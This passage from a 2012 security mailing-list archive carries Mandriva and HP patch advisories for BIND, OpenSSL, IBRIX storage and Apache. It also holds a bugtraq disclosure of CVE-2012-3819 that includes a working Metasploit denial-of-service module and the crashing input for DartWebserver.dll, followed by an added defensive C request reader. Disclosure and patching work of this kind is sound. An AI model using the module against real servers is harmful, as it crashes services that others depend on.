 687409d845cc1b964931e6a1f7494b6d  2011/SRPMS/bind-9.8.3-0.0.P3.0.1.src.rpm

 Mandriva Linux 2011/X86_64:
 dc178f953c803c2cb478d3b9149bdc61  2011/x86_64/bind-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm
 23ef816f7fffdc53b0465cf0316ccd68  2011/x86_64/bind-devel-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm
 0a555b8851f7a801c49bdcd0c425258a  2011/x86_64/bind-doc-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm
 19a19f9efd7e98e71b6463a8d12e8cfa  2011/x86_64/bind-utils-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm
 687409d845cc1b964931e6a1f7494b6d  2011/SRPMS/bind-9.8.3-0.0.P3.0.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQardomqjQ0CJFipgRApaBAKCKI7/uLjW1Jg5bWosgkiAR/Gzs7gCg2BF0
b0InYk0U+epOWE2Lmf5gKkw=
=SSd/
-END PGP SIGNATURE-



[security bulletin] HPSBUX02814 SSRT100930 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS)

2012-10-02 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03498127
Version: 1

HPSBUX02814 SSRT100930 rev.1 - HP-UX Running OpenSSL, Remote Denial of
Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-09-26
Last Updated: 2012-09-26

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX OpenSSL.
This vulnerability could be exploited remotely to create a Denial of Service
(DoS).

References: CVE-2012-2333

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08x.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-2333(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided upgrades to resolve this vulnerability.
The upgrades are available from the following location

https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=OPENSSL11I

HP-UX Release
 Depot Name

B.11.11 PA (32 and 64)
 OpenSSL_A.00.09.08x.001_HP-UX_B.11.11_32_64.depot

B.11.23 (PA and IA)
 OpenSSL_A.00.09.08x.002_HP-UX_B.11.23_IA_PA.depot

B.11.31 (PA and IA)
 OpenSSL_A.00.09.08x.003_HP-UX_B.11.31_IA_PA.depot

MANUAL ACTIONS: Yes - Update

Install OpenSSL A.00.09.08x or subsequent

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.11
==
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: Install revision A.00.09.08x.001 or subsequent

HP-UX B.11.23
==
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: Install revision A.00.09.08x.002 or subsequent

HP-UX B.11.31
==
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: Install revision A.00.09.08x.003 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 26 September 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates,

[security bulletin] HPSBST02818 SSRT100960 rev.1 - HP IBRIX X9000 Storage, Remote Disclosure of Information

2012-10-02 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03510876

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03510876
Version: 1

HPSBST02818 SSRT100960 rev.1 - HP IBRIX X9000 Storage, Remote Disclosure of
Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-10-01
Last Updated: 2012-10-01

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP IBRIX X9000
Storage. The vulnerability could be remotely exploited to allow disclosure of
information.

References: CVE-2012-3266

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP IBRIX X9000 Network Storage Systems running IBRIX versions v6.1.196,
v6.1.210, v6.1.228, v6.1.243, v6.1.247, v6.1.249, and v6.1.251.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3266(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided patches for HP IBRIX X9000 Network Storage Systems running
IBRIX. Please contact HP support to obtain IBRIX version v6.1.260 or later.

HISTORY
Version:1 (rev.1) - 1 October 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEUEARECAAYFAlBqDCcACgkQ4B86/C0qfVkadgCYroRkMPo//14HxZ/AgNnrPu6L
HACfXxLqxteu8lVqp4mL9pt6ga75L3I=
=HQO8
-END PGP SIGNATURE-


[ MDVSA-2012:154-1 ] apache

2012-10-02 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:154-1
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: October 1, 2012
 Affected: 2011.
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in apache
 (ASF HTTPD):
 
 Insecure handling of LD_LIBRARY_PATH was found that could lead to
 the current working directory being searched for DSOs. This could
 allow a local user to execute code as root if an administrator runs
 apachectl from an untrusted directory (CVE-2012-0883).
 
 Possible XSS for sites which use mod_negotiation and allow untrusted
 uploads to locations which have MultiViews enabled (CVE-2012-2687).
 
 The updated packages have been upgraded to the latest 2.2.23 version
 which is not vulnerable to these issues.

 Update:

 Packages for Mandriva Linux 2011 are also being provided.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0883
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2687
 http://httpd.apache.org/security/vulnerabilities_22.html
 http://www.apache.org/dist/httpd/CHANGES_2.2.23
 ___

 Updated Packages:

 Mandriva Linux 2011:
 304de24601ba6d0511bb81b874a0f233  2011/i586/apache-base-2.2.23-0.1-mdv2011.0.i586.rpm
 2cb8260077a6397789fbd5d4a4d085eb  2011/i586/apache-conf-2.2.23-0.1-mdv2011.0.i586.rpm
 30b35a2b7e38d194a2616aabf282fc8e  2011/i586/apache-devel-2.2.23-0.1-mdv2011.0.i586.rpm
 808b441d5f6a4dfe677027f052be5b2e  2011/i586/apache-doc-2.2.23-0.1-mdv2011.0.noarch.rpm
 48e1b89096e022e2370846ee6be23cb0  2011/i586/apache-htcacheclean-2.2.23-0.1-mdv2011.0.i586.rpm
 69e8ff977665c5ffcaa56a633a9c075d  2011/i586/apache-mod_authn_dbd-2.2.23-0.1-mdv2011.0.i586.rpm
 cef83ce377d853787f157372d174e43a  2011/i586/apache-mod_cache-2.2.23-0.1-mdv2011.0.i586.rpm
 e727d7356474d2899d971ded9ead528a  2011/i586/apache-mod_dav-2.2.23-0.1-mdv2011.0.i586.rpm
 a6d4a2d3bde1c22f9885e45674acb859  2011/i586/apache-mod_dbd-2.2.23-0.1-mdv2011.0.i586.rpm
 e95a0e806ed2714f58c4931f923dd9ff  2011/i586/apache-mod_deflate-2.2.23-0.1-mdv2011.0.i586.rpm
 eea3f9df618d84f4d7718fa7f7ed7fc2  2011/i586/apache-mod_disk_cache-2.2.23-0.1-mdv2011.0.i586.rpm
 f4e5b517609491cff78e787478701c2d  2011/i586/apache-mod_file_cache-2.2.23-0.1-mdv2011.0.i586.rpm
 e6b6bf3657df8d57f714b376f0a46c17  2011/i586/apache-mod_ldap-2.2.23-0.1-mdv2011.0.i586.rpm
 f08c6df85eee5fb376495a1962fe3b70  2011/i586/apache-mod_mem_cache-2.2.23-0.1-mdv2011.0.i586.rpm
 8e0e8200b769acf3c5e4bbe7726fd915  2011/i586/apache-mod_proxy-2.2.23-0.1-mdv2011.0.i586.rpm
 6c999383b58c6ee96282386b4fb7d9ea  2011/i586/apache-mod_proxy_ajp-2.2.23-0.1-mdv2011.0.i586.rpm
 20b0d2479343f49409b5e31e9338f4dc  2011/i586/apache-mod_proxy_scgi-2.2.23-0.1-mdv2011.0.i586.rpm
 1e51299c37aa0cbd03a65a260d12ddeb  2011/i586/apache-mod_reqtimeout-2.2.23-0.1-mdv2011.0.i586.rpm
 0ddbed217d6677478b0a2a01732ff491  2011/i586/apache-mod_ssl-2.2.23-0.1-mdv2011.0.i586.rpm
 0a14fbf39eab16eb6f306545149d1d08  2011/i586/apache-mod_suexec-2.2.23-0.1-mdv2011.0.i586.rpm
 58a903513f5debd76f3af90df3cb81f2  2011/i586/apache-modules-2.2.23-0.1-mdv2011.0.i586.rpm
 92dc4453fc1412585be0a2d6910ad1bb  2011/i586/apache-mod_userdir-2.2.23-0.1-mdv2011.0.i586.rpm
 a6fcd50c146c04c53adfd63cdeff0886  2011/i586/apache-mpm-event-2.2.23-0.1-mdv2011.0.i586.rpm
 2789b0dff916fbc432705402ccaf48b0  2011/i586/apache-mpm-itk-2.2.23-0.1-mdv2011.0.i586.rpm
 1373ec52e55560feab9bbc4841d121c7  2011/i586/apache-mpm-peruser-2.2.23-0.1-mdv2011.0.i586.rpm
 02b03a8c84896f04ce7c4ee098db88f1  2011/i586/apache-mpm-prefork-2.2.23-0.1-mdv2011.0.i586.rpm
 9fff7197d3b44a8dc4c328ae42b0c78d  2011/i586/apache-mpm-worker-2.2.23-0.1-mdv2011.0.i586.rpm
 b377ef4867bb4bb4740b6c454c673ae9  2011/i586/apache-source-2.2.23-0.1-mdv2011.0.i586.rpm
 ff8b62d886256d35b4b48b599dde8b42  2011/SRPMS/apache-2.2.23-0.1.src.rpm
 b293c41bc67cd64e55d4f76cbc01e5fa  2011/SRPMS/apache-conf-2.2.23-0.1.src.rpm
 7b26aff710ef4cf8761ee0f2d56335de  2011/SRPMS/apache-mod_suexec-2.2.23-0.1.src.rpm

 Mandriva Linux 2011/X86_64:
 c4985b28e7ec9150a212a50b83acf971  2011/x86_64/apache-base-2.2.23-0.1-mdv2011.0.x86_64.rpm
 1a47380b5c2408302ae45e53c57e3dd7  2011/x86_64/apache-conf-2.2.23-0.1-mdv2011.0.x86_64.rpm
 1ddc2098bd25562f20fb5dc13f15bbb4  2011/x86_64/apache-devel-2.2.23-0.1-mdv2011.0.x86_64.rpm
 98ebe1c72a3f4393089f4dff74478aef  2011/x86_64/apache-doc-2.2.23-0.1-mdv2011.0.noarch.rpm
 cdd1a070b46dae87bcc56c9ffdf787e1  2011/x86_64/apache-htcacheclean-2.2.23-0.1-mdv2011.0.x86_64.rpm
 b63b8c6c86a1d12c0d7d975965c68520  2011/x86_64/apache-mod_authn_dbd-2.2.23-0.1-mdv2011.0.x

CVE-2012-3819: Stack Overflow in DartWebserver.dll <= 1.9

2012-10-02 Thread Ken
Overview
===
DartWebserver.Dll is an HTTP server provided by Dart Communications
(dart.com). It is distributed in their PowerTCP/Webserver For ActiveX
product and likely other similar products.

"Build web applications in any familiar software development
environment. Use WebServer for ActiveX to add web-based access to
traditional compiled applications."

Version 1.9 and prior are vulnerable to a stack overflow exception;
these may be generated by producing large requests to the application,
e.g. "a" * 520 + "\n\n"

Analysis
===
During the processing of incoming HTTP requests the server collects
data until it encounters a "\n\n" sentinel. If the request is large,
multiple copies are made and stored on the stack; this quickly consumes
the stack space available to the process, leading to a stack overflow
exception being thrown. This exception is not handled and will
typically lead to the termination of the parent process. Some
variations may exist per system depending on pre-existing memory
conditions, and modification of the Proof of Concept (PoC) code may be
necessary to reproduce the exception.

Timeline
===
10/20/2011 - Discovered the bug in an affected vendor application
10/20/2011 - Contacted affected vendor
10/21/2011 - Affected vendor replies stating they cannot get the
product vendor to create a fix
06/29/2012 - CVE assignment
08/08/2012 - Contacted product vendor providing specifics
08/20/2012 - Product vendor created an issue number (#5654) for the
bug, but reply "there are not immediate plans to resolve the issue"
09/28/2012 - Posting to bugtraq, for the first time ever ;-)

PoC (MSF Module)
===
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dart Webserver <= 1.9.0 Stack Overflow',
      'Description'    => %q{
        Dart Webserver from Dart Communications throws a stack
        overflow exception when processing large requests.
      },
      'Author'         => [ 'catatonicprime' ],
      'Version'        => '$Revision: 15513 $',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2012-3819' ],
      ],
      'DisclosureDate' => '9/28/2012'))

    register_options([
      Opt::RPORT(80),
      OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', '52' ])
    ])
  end

  def run
    # Target string, kept for status output (not used in the request itself)
    serverIP = datastore['RHOST']
    if (datastore['RPORT'].to_i != 80)
      serverIP += ":" + datastore['RPORT'].to_s
    end
    size = datastore['SIZE']

    print_status("Crashing the server ...")
    # A request body of SIZE bytes followed by the end-of-headers sentinel
    request = "A" * size + "\r\n\r\n"
    connect
    sock.put(request)
    disconnect
  end
end
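The defensive counterpart to the behaviour described in the Analysis above, as an added example that is not part of Ken's post and not code from Dart Communications: a request reader that accumulates header bytes into one fixed-size, caller-owned buffer and refuses the request as soon as a cap is reached without seeing the "\n\n" or "\r\n\r\n" sentinel, so request size never drives stack usage. MAX_REQUEST, the function names and the sample requests (including the "A" * size shape from the PoC) are assumptions constructed for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Cap on the bytes accepted before the end-of-headers sentinel.
 * The value is an assumption for this demo, not a Dart setting. */
#define MAX_REQUEST 256

enum read_status { REQ_NEED_MORE = 0, REQ_COMPLETE = 1, REQ_TOO_LARGE = 2 };

/* One caller-owned buffer holds the whole request; its size does not
 * depend on the request, so a large request cannot grow stack usage. */
struct request_buf {
    char   data[MAX_REQUEST + 1];
    size_t len;
};

static void request_init(struct request_buf *rb)
{
    rb->len = 0;
    rb->data[0] = '\0';
}

/* Append one chunk received from the socket. Returns REQ_COMPLETE as soon
 * as the "\n\n" or "\r\n\r\n" sentinel is seen, REQ_TOO_LARGE if the cap
 * is hit before any sentinel, and REQ_NEED_MORE otherwise. */
enum read_status request_feed(struct request_buf *rb, const char *chunk, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (rb->len >= MAX_REQUEST)
            return REQ_TOO_LARGE;      /* refuse before doing any more work */
        rb->data[rb->len++] = chunk[i];
        rb->data[rb->len] = '\0';
        if (rb->len >= 2 && memcmp(rb->data + rb->len - 2, "\n\n", 2) == 0)
            return REQ_COMPLETE;
        if (rb->len >= 4 && memcmp(rb->data + rb->len - 4, "\r\n\r\n", 4) == 0)
            return REQ_COMPLETE;
    }
    return REQ_NEED_MORE;
}

/* Drive the reader over a byte stream in fixed-size chunks, the way a
 * recv() loop would, stopping at the first decisive status. */
enum read_status read_stream(const char *stream, size_t total, size_t chunk)
{
    struct request_buf rb;
    enum read_status st = REQ_NEED_MORE;
    request_init(&rb);
    for (size_t off = 0; off < total && st == REQ_NEED_MORE; off += chunk) {
        size_t n = (total - off < chunk) ? total - off : chunk;
        st = request_feed(&rb, stream + off, n);
    }
    return st;
}

/* Build the request shape the post describes ("A" repeated size times,
 * then the sentinel) as constructed input and return how the reader
 * classifies it. */
enum read_status simulate_large_request(size_t size)
{
    char buf[2048];
    if (size > sizeof buf - 4)
        size = sizeof buf - 4;
    memset(buf, 'A', size);
    memcpy(buf + size, "\r\n\r\n", 4);
    return read_stream(buf, size + 4, 64);
}

static const char *status_name(enum read_status st)
{
    return st == REQ_COMPLETE ? "complete"
         : st == REQ_TOO_LARGE ? "too large" : "need more";
}

int main(void)
{
    /* constructed sample request */
    const char *normal = "GET / HTTP/1.0\r\nHost: example\r\n\r\n";
    printf("normal request:       %s\n", status_name(read_stream(normal, strlen(normal), 5)));
    printf("16 x 'A' + sentinel:  %s\n", status_name(simulate_large_request(16)));
    printf("520 x 'A' + sentinel: %s\n", status_name(simulate_large_request(520)));
    return 0;
}
```

The point of the cap check sitting before the copy is that the 520-byte request from the post is rejected after 256 bytes without the server ever holding more than one copy of it; a request that fits the cap exactly and ends in the sentinel is still accepted.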